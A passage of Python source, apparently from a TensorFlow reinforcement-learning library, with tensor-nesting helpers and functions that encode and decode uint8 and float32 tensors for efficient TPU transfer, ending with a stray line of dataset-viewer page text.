return tf.nest.pack_sequence_as(self._specs, result)
def enqueue(self, vals, name=None):
tf.nest.assert_same_structure(vals, self._specs)
return super(StructuredFIFOQueue, self).enqueue(
tf.nest.flatten(vals), name=name)
def enqueue_many(self, vals, name=None):
tf.nest.assert_same_structure(vals, self._specs)
return super(StructuredFIFOQueue, self).enqueue_many(
tf.nest.flatten(vals), name=name)
def batch_apply(fn, inputs):
"""Folds time into the batch dimension, runs fn() and unfolds the result.
Args:
fn: Function that takes as input the n tensors of the tf.nest structure,
with shape [time*batch, <remaining shape>], and returns a tf.nest
structure of batched tensors.
inputs: tf.nest structure of n [time, batch, <remaining shape>] tensors.
Returns:
tf.nest structure of [time, batch, <fn output shape>]. Structure is
determined by the output of fn.
"""
time_to_batch_fn = lambda t: tf.reshape(t, [-1] + t.shape[2:].as_list())
batched = tf.nest.map_structure(time_to_batch_fn, inputs)
output = fn(*batched)
prefix = [int(tf.nest.flatten(inputs)[0].shape[0]), -1]
batch_to_time_fn = lambda t: tf.reshape(t, prefix + t.shape[1:].as_list())
return tf.nest.map_structure(batch_to_time_fn, output)
def make_time_major(x):
"""Transposes the batch and time dimensions of a nest of Tensors.
If an input tensor has rank < 2 it returns the original tensor. Retains as
much of the static shape information as possible.
Args:
x: A nest of Tensors.
Returns:
x transposed along the first two dimensions.
"""
def transpose(t):
t_static_shape = t.shape
if t_static_shape.rank is not None and t_static_shape.rank < 2:
return t
t_rank = tf.rank(t)
t_t = tf.transpose(t, tf.concat(([1, 0], tf.range(2, t_rank)), axis=0))
t_t.set_shape(
tf.TensorShape([t_static_shape[1],
t_static_shape[0]]).concatenate(t_static_shape[2:]))
return t_t
return tf.nest.map_structure(
lambda t: tf.xla.experimental.compile(transpose, [t])[0], x)
class TPUEncodedUInt8Spec(tf.TypeSpec):
"""Type specification for composite tensor TPUEncodedUInt8."""
def __init__(self, encoded_shape, original_shape):
self._value_specs = (tf.TensorSpec(encoded_shape, tf.uint32),)
self.original_shape = original_shape
@property
def _component_specs(self):
return self._value_specs
def _to_components(self, value):
return (value.encoded,)
def _from_components(self, components):
return TPUEncodedUInt8(components[0], self.original_shape)
def _serialize(self):
return self._value_specs[0].shape, self.original_shape
def _to_legacy_output_types(self):
return self._value_specs[0].dtype
def _to_legacy_output_shapes(self):
return self._value_specs[0].shape
@property
def value_type(self):
return TPUEncodedUInt8
class TPUEncodedUInt8(composite_tensor.CompositeTensor):
def __init__(self, encoded, shape):
self.encoded = encoded
self.original_shape = shape
self._spec = TPUEncodedUInt8Spec(encoded.shape, tf.TensorShape(shape))
@property
def _type_spec(self):
return self._spec
tensor_conversion_registry.register_tensor_conversion_function(
TPUEncodedUInt8, lambda value, *unused_args, **unused_kwargs: value.encoded)
class TPUEncodedF32Spec(tf.TypeSpec):
"""Type specification for composite tensor TPUEncodedF32Spec."""
def __init__(self, encoded_shape, original_shape):
self._value_specs = (tf.TensorSpec(encoded_shape, tf.float32),)
self.original_shape = original_shape
@property
def _component_specs(self):
return self._value_specs
def _to_components(self, value):
return (value.encoded,)
def _from_components(self, components):
return TPUEncodedF32(components[0], self.original_shape)
def _serialize(self):
return self._value_specs[0].shape, self.original_shape
def _to_legacy_output_types(self):
return self._value_specs[0].dtype
def _to_legacy_output_shapes(self):
return self._value_specs[0].shape
@property
def value_type(self):
return TPUEncodedF32
class TPUEncodedF32(composite_tensor.CompositeTensor):
def __init__(self, encoded, shape):
self.encoded = encoded
self.original_shape = shape
self._spec = TPUEncodedF32Spec(encoded.shape, tf.TensorShape(shape))
@property
def _type_spec(self):
return self._spec
tensor_conversion_registry.register_tensor_conversion_function(
TPUEncodedF32, lambda value, *unused_args, **unused_kwargs: value.encoded)
def num_divisible(v, m):
return sum([1 for x in v if x % m == 0])
def tpu_encode(ts):
"""Encodes a nest of Tensors in a suitable way for TPUs.
TPUs do not support tf.uint8, tf.uint16 and other data types. Furthermore,
the speed of transfer and device reshapes depend on the shape of the data.
This function tries to optimize the data encoding for a number of use cases.
Should be used on CPU before sending data to TPU and in conjunction with
`tpu_decode` after the data is transferred.
Args:
ts: A tf.nest of Tensors.
Returns:
A tf.nest of encoded Tensors.
"""
def visit(t):
num_elements = t.shape.num_elements()
# We need a multiple of 128 elements: encoding reduces the number of
# elements by a factor 4 (packing uint8s into uint32s), and first thing
# decode does is to reshape with a 32 minor-most dimension.
if (t.dtype == tf.uint8 and num_elements is not None and
num_elements % 128 == 0):
# For details of these transformations, see b/137182262.
x = tf.xla.experimental.compile(
lambda x: tf.transpose(x, list(range(1, t.shape.rank)) + [0]), [t])[0]
x = tf.reshape(x, [-1, 4])
x = tf.bitcast(x, tf.uint32)
x = tf.reshape(x, [-1])
return TPUEncodedUInt8(x, t.shape)
elif t.dtype == tf.uint8:
logging.warning('Inefficient uint8 transfer with shape: %s', t.shape)
return tf.cast(t, tf.bfloat16)
elif t.dtype == tf.uint16:
return tf.cast(t, tf.int32)
elif (t.dtype == tf.float32 and t.shape.rank > 1 and not
(num_divisible(t.shape.dims, 128) >= 1 and
num_divisible(t.shape.dims, 8) >= 2)):
x = tf.reshape(t, [-1])
return TPUEncodedF32(x, t.shape)
else:
return t
return tf.nest.map_structure(visit, ts)
def tpu_decode(ts, structure=None):
"""Decodes a nest of Tensors encoded with tpu_encode.
Args:
ts: A nest of Tensors or TPUEncodedUInt8 composite tensors.
structure: If not None, a nest of Tensors or TPUEncodedUInt8 composite
tensors (possibly within PerReplica's) that are only used to recreate the
structure of `ts` which then should be a list without composite tensors.
Returns:
A nest of decoded tensors packed as `structure` if available, otherwise
packed as `ts`.
"""
def visit(t, s):
s = s.values[0] if isinstance(s, values_lib.PerReplica) else s
if isinstance(s, TPUEncodedUInt8):
x = t.encoded if isinstance(t, TPUEncodedUInt8) else t
x = tf.reshape(x, [-1, 32, 1])
x = tf.broadcast_to(x, x.shape[:-1] + [4])
x = tf.reshape(x, [-1, 128])
x = tf.bitwise.bitwise_and(x, [0xFF, 0xFF00, 0xFF0000, 0xFF000000] * 32)
x = tf.bitwise.right_shift(x, [0, 8, 16, 24] * 32)
rank = s.original_shape.rank
perm = [rank - 1] + list(range(rank - 1))
inverted_shape = np.array(s.original_shape)[np.argsort(perm)]
x = tf.reshape(x, inverted_shape)
x = tf.transpose(x, perm)
return x
elif isinstance(s, TPUEncodedF32):
x = t.encoded if isinstance(t, TPUEncodedF32) else t
x = tf.reshape(x, s.original_shape)
return x
else:
return t
return tf.nest.map_structure(visit, ts, structure or ts)
def split_structure(structure, prefix_length):
"""Splits in two a tf.nest structure of tensors along the first axis."""
flattened = tf.nest.flatten(structure)
split = [tf.split(x, [prefix_length, tf.shape(x)[0] - prefix_length])
for x in flattened]
flattened_prefix = [pair[0] for pair in split]
flattened_suffix = [pair[1] for pair in split]
return (tf.nest.pack_sequence_as(structure, flattened_prefix),
tf.nest.pack_sequence_as(structure, flattened_suffix))
@contextlib.contextmanager
def nullcontext(*args, **kwds):
del args # unused
del kwds # unused
yield None
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.